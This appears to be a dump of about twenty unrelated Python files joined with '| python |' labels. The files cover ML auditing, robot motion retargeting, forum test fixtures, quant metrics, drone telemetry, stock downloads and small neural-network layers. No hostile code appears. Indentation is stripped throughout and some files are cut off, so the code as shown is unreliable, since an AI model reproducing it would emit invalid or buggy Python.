summary = {}
for column_name in list(intermediate.columns):
intermediate_column = intermediate[column_name]
col_metrics = {}
col_metrics['index'] = column_name
col_metrics['perc_25'] = np.percentile(intermediate_column, 25)
col_metrics['perc_50'] = np.percentile(intermediate_column, 50)
col_metrics['perc_75'] = np.percentile(intermediate_column, 75)
col_metrics['variance'] = np.var(intermediate_column)
col_metrics['std'] = np.std(intermediate_column)
col_metrics['entropy'] = entropy(intermediate_column)
summary[column_name] = col_metrics
return summary
def find_k_nearest_neighbors(self, data, instance, k=5):
'''Finds the k-nearest neighbors from the data to an instance.
Args:
data: The data that will be searched to find the nearest neighbors.
instance: the instance that needs to identify its nearest neighbors.
k: the number of nearest neighbors to consider.
Returns:
Array of the k nearest neighbors to the instance.
'''
nbrs = NearestNeighbors(n_neighbors=k, algorithm='ball_tree').fit(data)
distances, indices = nbrs.kneighbors([instance])
return data[indices]
def summarize_nearest_neighbors(self, folds_features, folds_targets, k=5):
'''Summarizes the nearest neighbors of a sample in the data.
Args:
folds_features: The folds containing the training and testing of the features data.
folds_targets: The folds containing the training and testing of the target data.
k: the number of nearest neighbors to consider
Returns:
Summary of all the features for the nearest neighbors.
'''
nearest_neighbors_summary = []
for x, y in zip(folds_features, folds_targets):
X_train = x[0]
X_test = x[1]
y_test = y[1]
indices_to_select = np.random.choice(range(len(X_test)), k, replace=False)
chosen_instances_features = X_test[indices_to_select]
chosen_instances_targets = y_test[indices_to_select]
fold_nearest_neighbors_summary = []
for instance_features, instance_target in zip(
chosen_instances_features, chosen_instances_targets):
nearest_neighbors = self.find_k_nearest_neighbors(X_train, instance_features, k)
neighbors_summary = self.intermediate_metrics(nearest_neighbors)
fold_nearest_neighbors_summary.append({'instance_features': instance_features,
'instance_target': instance_target,
'neighbors_summary': neighbors_summary})
nearest_neighbors_summary.append(fold_nearest_neighbors_summary)
return nearest_neighbors_summary
def generate_pipeline_report(self, pipeline_primitives, features,
target, problem_type, hyperparameters = None,
with_intermediates_metrics = False,
with_nearest_neighbors = False):
'''Generates the full report of the model auditor in a json format.
Args:
pipeline_primitives: Array of the pipeline primitives to run.
features: The features data to run through the pipeline.
target: The target data to run through the pipeline.
problem_type: The type of the problem (classification or regression).
hyperparameters: Specify parameters that must be specified in the primitives.
with_nearest_neighbors: A boolean to add or ignore the nearest neighbors metrics.
with_intermediates_metrics: A boolean to add or ignore the intermediates metrics.
Returns:
A json file of the model auditing results.
'''
report = {}
# Generate the folds
columns_names = list(features.columns)
features = np.array(features)
target = np.array(target)
folds_features, folds_targets = self.generate_kfolds(features, target)
# create the intermediates
intermediates_list = []
for x, y in zip(folds_features, folds_targets):
X_train = pd.DataFrame(x[0],columns = columns_names)
X_test = pd.DataFrame(x[1],columns = columns_names)
y_train = y[0]
fold_intermediates_list = self.execute_pipeline(pipeline_primitives, X_train,
y_train, X_test, problem_type,
with_intermediate = with_intermediates_metrics,
hyperparameters = hyperparameters)
intermediates_list.append(fold_intermediates_list)
# print(intermediates_list)
output_result = []
if problem_type == 'classification':
for actual, predicted in zip(folds_targets, intermediates_list):
fold_result = self.report_classification_result(actual[1], predicted[-1])
output_result.append(fold_result)
elif problem_type == 'regression':
for actual, predicted in zip(folds_targets, intermediates_list):
fold_result = self.report_regression_result(actual[1], predicted[-1])
output_result.append(fold_result)
report['output_result'] = output_result
if with_intermediates_metrics:
intermediates_metrics = {}
for fold in intermediates_list:
for idx,intermediate in enumerate(fold[:-1]):
intermediate_key = str(idx)+ '.' + pipeline_primitives[idx]
try:
intermediate_result = self.intermediate_metrics(intermediate)
intermediates_metrics[intermediate_key] = intermediate_result
except BaseException as e:
print(e.args)
warnings.warn(
'intermediate metrics can\'t be calculated for {}'.format(intermediate_key),
UserWarning)
report['intermediates_result'] = intermediates_metrics
if with_nearest_neighbors:
nearest_neighbors = self.summarize_nearest_neighbors(folds_features, folds_targets, k=5)
report['nearest_neighbors'] = nearest_neighbors
return report
def generate_pipeline_report_with_test(self, pipeline_primitives, features,
target, test, actual, problem_type, hyperparameters = None,
with_intermediates_metrics = False,
with_nearest_neighbors = False):
'''Generates the full report of the model auditor in a json format.
Args:
pipeline_primitives: Array of the pipeline primitives to run.
features: The features data to run through the pipeline.
target: The target data to run through the pipeline.
problem_type: The type of the problem (classification or regression).
hyperparameters: Specify parameters that must be specified in the primitives.
with_nearest_neighbors: A boolean to add or ignore the nearest neighbors metrics.
with_intermediates_metrics: A boolean to add or ignore the intermediates metrics.
Returns:
A json file of the model auditing results.
'''
report = {}
# Generate the folds
columns_names = list(features.columns)
X_train = np.array(features)
y_train = np.array(target)
X_test = np.array(test)
y_test = np.array(actual)
# print("X_train ", X_train.shape)
# print("y_train ", y_train.shape)
# print("X_test ", X_test.shape)
# print("y_test ", y_test.shape)
y_pred = self.execute_pipeline(pipeline_primitives, X_train, y_train, X_test, problem_type,
with_intermediate=False,
hyperparameters=hyperparameters)
output_result = []
if problem_type == 'classification':
fold_result = self.report_classification_result(y_test, y_pred[-1])
output_result.append(fold_result)
elif problem_type == 'regression':
fold_result = self.report_regression_result(y_test, y_pred[-1])
output_result.append(fold_result)
report['output_result'] = output_result
if with_nearest_neighbors:
nearest_neighbors = self.summarize_nearest_neighbors(X_test, y_test, k=5)
report['nearest_neighbors'] = nearest_neighbors
return report
| python |
import torch
import torch.nn as nn
import torch.optim as optim
import torch_geometric.transforms as transforms
from torch_geometric.data import Data, Batch
from tensorboardX import SummaryWriter
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import mpl_toolkits.mplot3d.axes3d as p3
import numpy as np
import h5py
import argparse
import logging
import time
import os
import copy
from datetime import datetime
import dataset
from dataset import Normalize, parse_h5
from models import model
from models.loss import CollisionLoss, JointLimitLoss, RegLoss
from train import train_epoch
from utils.config import cfg
from utils.util import create_folder
# Argument parse
parser = argparse.ArgumentParser(description='Inference with trained model')
parser.add_argument('--cfg', default='configs/inference/yumi.yaml', type=str, help='Path to configuration file')
args = parser.parse_args()
# Configurations parse
cfg.merge_from_file(args.cfg)
cfg.freeze()
print(cfg)
# Create folder
create_folder(cfg.OTHERS.SAVE)
create_folder(cfg.OTHERS.LOG)
create_folder(cfg.OTHERS.SUMMARY)
# Create logger & tensorboard writer
logging.basicConfig(level=logging.INFO, format="%(message)s", handlers=[logging.FileHandler(os.path.join(cfg.OTHERS.LOG, "{:%Y-%m-%d_%H-%M-%S}.log".format(datetime.now()))), logging.StreamHandler()])
logger = logging.getLogger()
writer = SummaryWriter(os.path.join(cfg.OTHERS.SUMMARY, "{:%Y-%m-%d_%H-%M-%S}".format(datetime.now())))
# Device setting
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
if __name__ == '__main__':
# Load data
pre_transform = transforms.Compose([Normalize()])
test_data, l_hand_angle, r_hand_angle= parse_h5(filename=cfg.INFERENCE.MOTION.SOURCE, selected_key=cfg.INFERENCE.MOTION.KEY)
test_data = [pre_transform(data) for data in test_data]
indices = [idx for idx in range(0, len(test_data), cfg.HYPER.BATCH_SIZE)]
test_loader = [test_data[idx: idx+cfg.HYPER.BATCH_SIZE] for idx in indices]
test_target = sorted([target for target in getattr(dataset, cfg.DATASET.TEST.TARGET_NAME)(root=cfg.DATASET.TEST.TARGET_PATH)], key=lambda target : target.skeleton_type)
hf = h5py.File(os.path.join(cfg.INFERENCE.H5.PATH, 'source.h5'), 'w')
g1 = hf.create_group('group1')
source_pos = torch.stack([data.pos for data in test_data], dim=0)
g1.create_dataset('l_joint_pos_2', data=source_pos[:, :3])
g1.create_dataset('r_joint_pos_2', data=source_pos[:, 3:])
hf.close()
print('Source H5 file saved!')
# Create model
model = getattr(model, cfg.MODEL.NAME)().to(device)
# Load checkpoint
if cfg.MODEL.CHECKPOINT is not None:
model.load_state_dict(torch.load(cfg.MODEL.CHECKPOINT))
# store initial z
model.eval()
z_all = []
for batch_idx, data_list in enumerate(test_loader):
for target_idx, target in enumerate(test_target):
# fetch target
target_list = [target for data in data_list]
# forward
z = model.encode(Batch.from_data_list(data_list).to(device)).detach()
# z = torch.empty(Batch.from_data_list(target_list).x.size(0), 64).normal_(mean=0, std=0.005).to(device)
z.requires_grad = True
z_all.append(z)
# Create loss criterion
# end effector loss
ee_criterion = nn.MSELoss() if cfg.LOSS.EE else None
# vector similarity loss
vec_criterion = nn.MSELoss() if cfg.LOSS.VEC else None
# collision loss
col_criterion = CollisionLoss(cfg.LOSS.COL_THRESHOLD) if cfg.LOSS.COL else None
# joint limit loss
lim_criterion = JointLimitLoss() if cfg.LOSS.LIM else None
# end effector orientation loss
ori_criterion = nn.MSELoss() if cfg.LOSS.ORI else None
# regularization loss
reg_criterion = RegLoss() if cfg.LOSS.REG else None
# Create optimizer
optimizer = optim.Adam(z_all, lr=cfg.HYPER.LEARNING_RATE)
best_loss = float('Inf')
best_z_all = copy.deepcopy(z_all)
best_cnt = 0
start_time = time.time()
# latent optimization
for epoch in range(cfg.HYPER.EPOCHS):
train_loss = train_epoch(model,
ee_criterion, vec_criterion, col_criterion, lim_criterion, ori_criterion, reg_criterion,
optimizer,
test_loader, test_target,
epoch, logger, cfg.OTHERS.LOG_INTERVAL, writer, device, z_all)
# Save model
if train_loss > best_loss:
best_cnt += 1
else:
best_cnt = 0
best_loss = train_loss
best_z_all = copy.deepcopy(z_all)
if best_cnt == 5:
logger.info("Interation Finished")
break
print(best_cnt)
# store final results
model.eval()
pos_all = []
ang_all = []
for batch_idx, data_list in enumerate(test_loader):
for target_idx, target in enumerate(test_target):
# fetch target
target_list = [target for data in data_list]
# fetch z
z = best_z_all[batch_idx]
# forward
target_ang, target_pos, _, _, _, _, target_global_pos = model.decode(z, Batch.from_data_list(target_list).to(z.device))
pos_all.append(target_global_pos)
ang_all.append(target_ang)
if cfg.INFERENCE.H5.BOOL:
pos = torch.cat(pos_all, dim=0).view(len(test_data), -1, 3).detach().cpu().numpy() # [T, joint_num, xyz]
ang = torch.cat(ang_all, dim=0).view(len(test_data), -1).detach().cpu().numpy()
hf = h5py.File(os.path.join(cfg.INFERENCE.H5.PATH, 'inference.h5'), 'w')
g1 = hf.create_group('group1')
g1.create_dataset('l_joint_pos_2', data=pos[:, :7])
g1.create_dataset('r_joint_pos_2', data=pos[:, 7:])
g1.create_dataset('l_joint_angle_2', data=ang[:, :7])
g1.create_dataset('r_joint_angle_2', data=ang[:, 7:])
g1.create_dataset('l_glove_angle_2', data=l_hand_angle)
g1.create_dataset('r_glove_angle_2', data=r_hand_angle)
hf.close()
print('Target H5 file saved!')
| python |
"""
:Copyright: 2014-2022 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from typing import Optional
import pytest
from byceps.services.board.dbmodels.posting import Posting as DbPosting
from byceps.services.board.dbmodels.topic import Topic as DbTopic
from byceps.services.board.transfer.models import Board, Category
from byceps.services.user.transfer.models import User
from tests.helpers import log_in_user
from .helpers import create_category, create_posting, create_topic
@pytest.fixture(scope='package')
def category(board: Board) -> Category:
return create_category(board.id, number=1)
@pytest.fixture(scope='package')
def another_category(board: Board) -> Category:
return create_category(board.id, number=2)
@pytest.fixture
def topic(category: Category, board_poster: User) -> DbTopic:
return create_topic(category.id, board_poster.id)
@pytest.fixture
def posting(topic: DbTopic, board_poster: User) -> DbPosting:
return create_posting(topic.id, board_poster.id)
@pytest.fixture(scope='package')
def board_poster(make_user) -> User:
return make_user()
@pytest.fixture(scope='package')
def moderator(make_admin) -> User:
permission_ids = {
'board.hide',
'board_topic.lock',
'board_topic.move',
'board_topic.pin',
}
moderator = make_admin(permission_ids)
log_in_user(moderator.id)
return moderator
@pytest.fixture(scope='package')
def moderator_client(make_client, site_app, moderator: User):
return make_client(site_app, user_id=moderator.id)
| python |
"""
Here is a batch of evaluation functions.
The interface should be redesigned carefully in the future.
"""
import pandas as pd
from typing import Tuple
from qlib import get_module_logger
from qlib.utils.paral import complex_parallel, DelayedDict
from joblib import Parallel, delayed
def calc_long_short_prec(
pred: pd.Series, label: pd.Series, date_col="datetime", quantile: float = 0.2, dropna=False, is_alpha=False
) -> Tuple[pd.Series, pd.Series]:
"""
calculate the precision for long and short operation
:param pred/label: index is **pd.MultiIndex**, index name is **[datetime, instruments]**; columns names is **[score]**.
.. code-block:: python
score
datetime instrument
2020-12-01 09:30:00 SH600068 0.553634
SH600195 0.550017
SH600276 0.540321
SH600584 0.517297
SH600715 0.544674
label :
label
date_col :
date_col
Returns
-------
(pd.Series, pd.Series)
long precision and short precision in time level
"""
if is_alpha:
label = label - label.mean(level=date_col)
if int(1 / quantile) >= len(label.index.get_level_values(1).unique()):
raise ValueError("Need more instruments to calculate precision")
df = pd.DataFrame({"pred": pred, "label": label})
if dropna:
df.dropna(inplace=True)
group = df.groupby(level=date_col)
N = lambda x: int(len(x) * quantile)
# find the top/low quantile of prediction and treat them as long and short target
long = group.apply(lambda x: x.nlargest(N(x), columns="pred").label).reset_index(level=0, drop=True)
short = group.apply(lambda x: x.nsmallest(N(x), columns="pred").label).reset_index(level=0, drop=True)
groupll = long.groupby(date_col)
l_dom = groupll.apply(lambda x: x > 0)
l_c = groupll.count()
groups = short.groupby(date_col)
s_dom = groups.apply(lambda x: x < 0)
s_c = groups.count()
return (l_dom.groupby(date_col).sum() / l_c), (s_dom.groupby(date_col).sum() / s_c)
def calc_long_short_return(
pred: pd.Series,
label: pd.Series,
date_col: str = "datetime",
quantile: float = 0.2,
dropna: bool = False,
) -> Tuple[pd.Series, pd.Series]:
"""
calculate long-short return
Note:
`label` must be raw stock returns.
Parameters
----------
pred : pd.Series
stock predictions
label : pd.Series
stock returns
date_col : str
datetime index name
quantile : float
long-short quantile
Returns
----------
long_short_r : pd.Series
daily long-short returns
long_avg_r : pd.Series
daily long-average returns
"""
df = pd.DataFrame({"pred": pred, "label": label})
if dropna:
df.dropna(inplace=True)
group = df.groupby(level=date_col)
N = lambda x: int(len(x) * quantile)
r_long = group.apply(lambda x: x.nlargest(N(x), columns="pred").label.mean())
r_short = group.apply(lambda x: x.nsmallest(N(x), columns="pred").label.mean())
r_avg = group.label.mean()
return (r_long - r_short) / 2, r_avg
def pred_autocorr(pred: pd.Series, lag=1, inst_col="instrument", date_col="datetime"):
"""pred_autocorr.
Limitation:
- If the datetime is not sequential densely, the correlation will be calulated based on adjacent dates. (some users may expected NaN)
:param pred: pd.Series with following format
instrument datetime
SH600000 2016-01-04 -0.000403
2016-01-05 -0.000753
2016-01-06 -0.021801
2016-01-07 -0.065230
2016-01-08 -0.062465
:type pred: pd.Series
:param lag:
"""
if isinstance(pred, pd.DataFrame):
pred = pred.iloc[:, 0]
get_module_logger("pred_autocorr").warning("Only the first column in {pred.columns} of `pred` is kept")
pred_ustk = pred.sort_index().unstack(inst_col)
corr_s = {}
for (idx, cur), (_, prev) in zip(pred_ustk.iterrows(), pred_ustk.shift(lag).iterrows()):
corr_s[idx] = cur.corr(prev)
corr_s = pd.Series(corr_s).sort_index()
return corr_s
def pred_autocorr_all(pred_dict, n_jobs=-1, **kwargs):
"""
calculate auto correlation for pred_dict
Parameters
----------
pred_dict : dict
A dict like {<method_name>: <prediction>}
kwargs :
all these arguments will be passed into pred_autocorr
"""
ac_dict = {}
for k, pred in pred_dict.items():
ac_dict[k] = delayed(pred_autocorr)(pred, **kwargs)
return complex_parallel(Parallel(n_jobs=n_jobs, verbose=10), ac_dict)
def calc_ic(pred: pd.Series, label: pd.Series, date_col="datetime", dropna=False) -> (pd.Series, pd.Series):
"""calc_ic.
Parameters
----------
pred :
pred
label :
label
date_col :
date_col
Returns
-------
(pd.Series, pd.Series)
ic and rank ic
"""
df = pd.DataFrame({"pred": pred, "label": label})
ic = df.groupby(date_col).apply(lambda df: df["pred"].corr(df["label"]))
ric = df.groupby(date_col).apply(lambda df: df["pred"].corr(df["label"], method="spearman"))
if dropna:
return ic.dropna(), ric.dropna()
else:
return ic, ric
def calc_all_ic(pred_dict_all, label, date_col="datetime", dropna=False, n_jobs=-1):
"""calc_all_ic.
Parameters
----------
pred_dict_all :
A dict like {<method_name>: <prediction>}
label:
A pd.Series of label values
Returns
-------
{'Q2+IND_z': {'ic': <ic series like>
2016-01-04 -0.057407
...
2020-05-28 0.183470
2020-05-29 0.171393
'ric': <rank ic series like>
2016-01-04 -0.040888
...
2020-05-28 0.236665
2020-05-29 0.183886
}
...}
"""
pred_all_ics = {}
for k, pred in pred_dict_all.items():
pred_all_ics[k] = DelayedDict(["ic", "ric"], delayed(calc_ic)(pred, label, date_col=date_col, dropna=dropna))
pred_all_ics = complex_parallel(Parallel(n_jobs=n_jobs, verbose=10), pred_all_ics)
return pred_all_ics
| python |
from setuptools import setup, find_packages
from os.path import join, dirname
import sys
if sys.version_info[0] != 3 or sys.version_info[1] < 6:
print("This script requires Python >= 3.6")
exit(1)
setup(
name="vkmix",
version="1.5",
author="alekssamos",
author_email="[email protected]",
url="https://github.com/alekssamos/vkmix/",
packages=find_packages(),
include_package_data=True,
long_description_content_type="text/markdown",
long_description=open(join(dirname(__file__), "README.md"), encoding="UTF8").read(),
)
| python |
"""A basic JSON encoder to handle numpy and bytes types
>>> bool_array = np.array([True])
>>> bool_value = bool_array[0]
>>> obj = {'an_array': np.array(['a']), 'an_int64': np.int64(1), 'some_bytes': b'a', 'a_bool': bool_value}
>>> assert dumps(obj)
"""
import base64
import json
from functools import partial
import numpy as np
class OtoJsonEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
if isinstance(obj, np.int64):
return float(obj)
if isinstance(obj, bytes):
return base64.b64encode(obj).decode('utf-8')
if isinstance(obj, np.bool_):
return True if np.bool_(True) == obj else False
return json.JSONEncoder.default(self, obj)
json_dump_partial_kwargs = {
'allow_nan': False,
'indent': None,
'separators': (',', ':'),
'sort_keys': True,
'cls': OtoJsonEncoder,
}
dump = partial(json.dump, **json_dump_partial_kwargs)
dumps = partial(json.dumps, **json_dump_partial_kwargs)
| python |
# -*- coding: utf-8 -*-
import codecs
import io
import logging
import os
import re
import shutil
import sys
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import tempfile
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
from py3kwarn2to3 import main
TEST_DATA_DIR = os.path.join(os.path.dirname(__file__), "data")
PY2_TEST_MODULE = os.path.join(TEST_DATA_DIR, "py2_test_grammar.py")
class TestMain(unittest.TestCase):
if not hasattr(unittest.TestCase, 'assertNotRegex'):
# This method was only introduced in 3.2.
def assertNotRegex(self, text, regexp, msg=None):
if not hasattr(regexp, 'search'):
regexp = re.compile(regexp)
if regexp.search(text):
self.fail("regexp %s MATCHED text %r" % (regexp.pattern, text))
def setUp(self):
self.temp_dir = None # tearDown() will rmtree this directory if set.
def tearDown(self):
# Clean up logging configuration down by main.
del logging.root.handlers[:]
if self.temp_dir:
shutil.rmtree(self.temp_dir)
def run_2to3_capture(self, args, in_capture, out_capture, err_capture):
save_stdin = sys.stdin
save_stdout = sys.stdout
save_stderr = sys.stderr
sys.stdin = in_capture
sys.stdout = out_capture
sys.stderr = err_capture
try:
return main.main("py3kwarn2to3.fixes", args)
finally:
sys.stdin = save_stdin
sys.stdout = save_stdout
sys.stderr = save_stderr
def test_unencodable_diff(self):
input_stream = StringIO(u"print 'nothing'\nprint u'über'\n")
out = io.BytesIO() if sys.version_info[0] > 2 else StringIO()
out_enc = codecs.getwriter("ascii")(out)
err = StringIO()
ret = self.run_2to3_capture(["-"], input_stream, out_enc, err)
self.assertEqual(ret, 0)
output = out.getvalue()
if sys.version_info[0] > 2:
output = output.decode("ascii")
self.assertTrue("-print 'nothing'" in output)
self.assertTrue("WARNING: couldn't encode <stdin>'s diff for "
"your terminal" in err.getvalue())
def setup_test_source_trees(self):
"""Setup a test source tree and output destination tree."""
self.temp_dir = tempfile.mkdtemp() # tearDown() cleans this up.
self.py2_src_dir = os.path.join(self.temp_dir, "python2_project")
self.py3_dest_dir = os.path.join(self.temp_dir, "python3_project")
os.mkdir(self.py2_src_dir)
os.mkdir(self.py3_dest_dir)
# Turn it into a package with a few files.
self.setup_files = []
open(os.path.join(self.py2_src_dir, "__init__.py"), "w").close()
self.setup_files.append("__init__.py")
shutil.copy(PY2_TEST_MODULE, self.py2_src_dir)
self.setup_files.append(os.path.basename(PY2_TEST_MODULE))
self.trivial_py2_file = os.path.join(self.py2_src_dir, "trivial.py")
self.init_py2_file = os.path.join(self.py2_src_dir, "__init__.py")
with open(self.trivial_py2_file, "w") as trivial:
trivial.write("print 'I need a simple conversion.'")
self.setup_files.append("trivial.py")
if __name__ == '__main__':
unittest.main()
| python |
from django.contrib import admin
from .models import Nurse, NursePatient
class NurseAdmin(admin.ModelAdmin):
model = Nurse
list_display = ['user', ]
class NursePatientAdmin(admin.ModelAdmin):
model = NursePatient
list_display = ['nurse', 'patient', ]
admin.site.register(Nurse, NurseAdmin)
admin.site.register(NursePatient, NursePatientAdmin)
# Register your models here.
| python |
class Reactor(object) :
def addReadCallback( self, sockfd, callback ) :
raise NotImplementedError
def removeReadCallback( self, sockfd ) :
raise NotImplementedError
def addWriteCallback( self, sockfd, callback ) :
raise NotImplementedError
def removeWriteCallback( self, sockfd ) :
raise NotImplementedError
def addExceptionCallback( self, sockfd, callback ) :
raise NotImplementedError
def removeExceptionCallback( self, sockfd ) :
raise NotImplementedError
# timeout is seconds in floating point, returns async.Op
def addTimer( self, timeout, callback=None ) :
raise NotImplementedError
# single shot timer, timeout is float, return async.Op
def callLater( self, timeout, callback=None ) :
raise NotImplementedError
| python |
from dronekit import *
from pymavlink import mavutil
import argparse
import serial
from random import uniform
class Pixhawk:
def __init__(self):
self.status = (
"down"
) # this status is used to check if a service is functioning normaly or not
self.vehicle = None
def start(self):
print("starting Pixhawk")
self.status = "running"
# this function will at least connect to pixhawk for future telem data retrieval.
parser = argparse.ArgumentParser()
parser.add_argument("--connect", default="/dev/serial0")
parser.add_argument("--baud", default="921600")
args = parser.parse_args()
self.connect(args)
def stop(self):
print("stopping Telemetry Data")
self.status = "down"
# this function should kill the connection to the pixhawk and
# any other processes it has started.
self.disconnect()
def check_status(self):
# check all possible processes that may not be working properly, make sure they return
# expected values.
# return list of broken services.
if self.connection_status:
print("Status: Active")
print("GPS connection state: %s" % vehicle.gps_0)
else:
print("Status: Broken (see above for details)")
# Connect to the vehicle
def connect(self, args):
print("Connecting to aircraft via: %s" % args.connect)
try:
self.vehicle = connect(args.connect, baud=921600, wait_ready=True)
self.connection_status = 1
# Dronekit Error
except APIException:
print("The connection has timed out.")
self.connection_status = 0
self.status = "pixhawk connection broken"
# Other error
except:
print("Error connecting to pixhawk via serial.")
self.connection_status = 0
self.status = "pixhawk connection broken"
# Close vehicle connection
def disconnect(self):
self.vehicle.close()
self.connection_status = 0
# Use for testing gps signal and telemetry data retrieval. WARNING: this method creates an infinite loop.
def gps_test(self):
pass
while True:
time.sleep(1)
def getDirection(self):
# Returns a value between 0-360 depending on the direction the ground vehicle is facing
if not self.vehicle:
return -1
return -1
def getLat(self): # Get vehicle latitude
if not self.vehicle:
return -1
return str(self.vehicle.location.global_relative_frame.lat)
def getLon(self): # Get vehicle longitude
if not self.vehicle:
return -1
return str(self.vehicle.location.global_relative_frame.lon)
def getAlt(self): # Get vehicle altitude
if not self.vehicle:
return -1
return self.vehicle.location.global_relative_frame.alt
def get_location(self): # Get vehicle postion (Returns dict of lat,long, and alt)
return {"lat": self.getLat(), "lon": self.getLon(), "alt": self.getAlt()}
pixhawk = Pixhawk()
| python |
import brownie
def test_withdraw_all(splitter, alice, bob):
initial_alice_balance = alice.balance()
initial_contract_balance = splitter.balance()
initial_alice_contract_balance = splitter.balances(alice)["balance"]
initial_bob_balance = bob.balance()
initial_bob_contract_balance = splitter.balances(bob)["balance"]
splitter.withdrawAll({"from": alice})
assert alice.balance() - initial_alice_balance == initial_alice_contract_balance
assert initial_bob_balance == bob.balance()
assert initial_bob_contract_balance == splitter.balances(bob)["balance"]
assert splitter.balances(alice)["balance"] == 0
assert (
splitter.balance() == initial_contract_balance - initial_alice_contract_balance
)
def test_withdraw_all_zero_amount(splitter, alice):
splitter.withdrawAll({"from": alice})
with brownie.reverts():
splitter.withdrawAll({"from": alice})
def test_withdraw_all_not_payee(splitter, david):
with brownie.reverts():
splitter.withdrawAll({"from": david})
| python |
#econogee, 1/28/2016
#Stock Data Retrieval Script
#If executed via the command line, will produce 500 data files with stock price information
#between the dates specified in the main method. Can also be imported to use the RetrieveStock method.
import os
import sys
import numpy as np
import urllib2
def RetrieveStock(TickerSymbol,start,end):
startday,startmonth,startyear = (str(s) for s in start)
endday,endmonth,endyear = (str(s) for s in end)
response = urllib2.urlopen('http://real-chart.finance.yahoo.com/table.csv?s='+str(TickerSymbol)+\
'&a=' + startday + '&b=' + startmonth + '&c=' + startyear + \
'&d=' + endday + '&e=' + endmonth + '&f=' + endyear + \
'&g=d&ignore=.csv')
html = response.read()
html = html.split('\n')
html = np.array(html)
return html
def main():
startday = str(0)
startmonth = str(1)
startyear = str(2005)
endday = str(30)
endmonth = str(1)
endyear = str(2016)
symbols = []
with open('stocklist.csv') as f:
content = f.readlines()
for l in content:
symbols.append(l.split(",")[0])
for s in symbols:
html = RetrieveStock(s,(startday,startmonth,startyear),(endday,endmonth,endyear))
np.savetxt(str(s),html,fmt='%s',delimiter=',')
if __name__ == "__main__": main() | python |
import os
import sys
def pre_process(baseDir, x1, x2, x3):
"""
An utility function to pre-process the .comm input files by reading it
and replacing the design variables(Length, Breadth and Thickness) values with
the values provided by BOA
PARAMS:
baseDir - The path of the directory which holds the required input files
x1 - Length
x2 - Thickness
x3 - Breadth
RETURNS:
This function returns the name of export file which is present
in the baseDir which is required for simulation
"""
cnt = 0
# Getting the path of the required input files present in the baseDir
for file in os.listdir(baseDir):
if file.endswith(".comm"):
cnt += 1
comm_file = os.path.join(baseDir, file)
elif file.endswith(".export"):
cnt += 1
export_file = file
elif file.endswith(".mmed"):
cnt += 1
# Checking whether the base directory has all required input files
if cnt < 3:
raise FileNotFoundError("One or all required input files are missing "
"in the directory")
sys.exit()
# Opening the .comm file to pre-process the design variables
fhc = open(comm_file, 'r+')
data = fhc.readlines()
# Loops to update all 3 design variables values
# EP - thickness, LONG - Length, LARG - Breadth
for i, v in enumerate(data):
if 'EP' in v:
data[i] = v.split('=')[0] + '= ' + str(x2) + '\n'
break
for i, v in enumerate(data):
if 'LONG' in v:
data[i] = v.split('=')[0] + '= ' + str(x1) + '\n'
break
for i, v in enumerate(data):
if 'LARG' in v:
data[i] = v.split('=')[0] + '= ' + str(x3) + '\n'
break
# Writing the new data to .comm file
fhc.seek(0)
fhc.truncate()
fhc.writelines(data)
fhc.close()
return export_file
def post_process(baseDir):
"""
An utility function to post-process the .resu result file to get
the desired displacement value from file
PARAMS:
baseDir - The path of the directory which holds the output .resu file
RETURNS:
This function returns the displacement value for that epoch
"""
# Getting the path of the output file created in the baseDir post simulation
for file in os.listdir(baseDir):
if file.endswith(".resu"):
resu_file = os.path.join(baseDir, file)
# Opening the .resu file to post-process the result to get the required
# Displacement variable value
fhc = open(resu_file, 'r')
data = fhc.readlines()
fhc.close()
# Post processing the result
y = data[198].split()[-1]
# Delete the result file
os.remove(resu_file)
return float(y)
| python |
#! /usr/bin/env python3.8
from larning.setup import (
get_version,
get_github_url,
PACKAGE_NAME,
PACKAGES,
setup,
LONG_DESCRIPTION,
require_interpreter_version,
)
# ˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇˇ
require_interpreter_version(3, 8, 0)
version = get_version(0, 0, 0)
INSTALL_REQUIRES = []
AUTHOR = "Tasnádi Gábor"
EMAIL = "[email protected]"
URL = get_github_url("tasigabi97")
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
setup(
name=PACKAGE_NAME,
version=version,
author=AUTHOR,
author_email=EMAIL,
description=PACKAGE_NAME,
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
url=URL,
packages=PACKAGES,
include_package_data=True,
classifiers=[
"Programming Language :: Python :: 3",
"Development Status :: 3 - Alpha",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
],
install_requires=INSTALL_REQUIRES,
keywords=[
PACKAGE_NAME,
],
license="MIT",
)
| python |
import torch.nn as nn
import torch
import math
class AffinityLayer(nn.Module):
"""
Affinity Layer to compute the affinity matrix from feature space.
M = X * A * Y^T
Parameter: scale of weight d
Input: feature X, Y
Output: affinity matrix M
"""
def __init__(self, dim):
super(AffinityLayer, self).__init__()
self.dim = dim # 1024
self.A = nn.Parameter(torch.Tensor(self.dim, self.dim))
self.reset_parameters()
def reset_parameters(self):
std = 1. / math.sqrt(self.dim)
self.A.data.uniform_(-std, std)
self.A.data += torch.eye(self.dim)
def forward(self, X, Y):
assert X.shape[2] == Y.shape[2] == self.dim
M = torch.matmul(X, (self.A + self.A.transpose(0, 1)) / 2)
M = torch.matmul(M, Y.transpose(1, 2))
return M
| python |
import numpy as np
def sigmoid(x):
return 1 / (1 + np.exp(-x))
def softmax(x):
x_exp = np.exp(x)
return x_exp /np.sum(x_exp)
def relu(x):
return np.maximum(x, np.zeros_like(x))
| python |
"""
Author: Trenton Bricken @trentbrick
All functions in this script are used to generate and approximate the circle intersection
